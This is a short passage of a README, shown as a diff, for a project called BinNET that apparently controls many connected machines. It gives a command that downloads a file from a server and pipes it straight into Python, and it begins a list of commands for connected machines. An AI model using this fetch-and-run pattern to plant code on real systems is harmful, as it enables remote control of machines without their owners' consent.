binlaab/BinNET/README.md

 curl -s -X GET http(s)://yourip/yourfile | python
 ```
 This reads the file from your server and runs it with Python.
 It can also run in Windows if the machine has curl installed.

+If you are connected to an intranet in the 192.168.1.0/24 range, it will return your private IP.
+Else, it will return your public IP.
+I'm currently working on making it work with all private IPs.

 ## Available commands(i'll update them)
 ```
 list: lists all machines connected.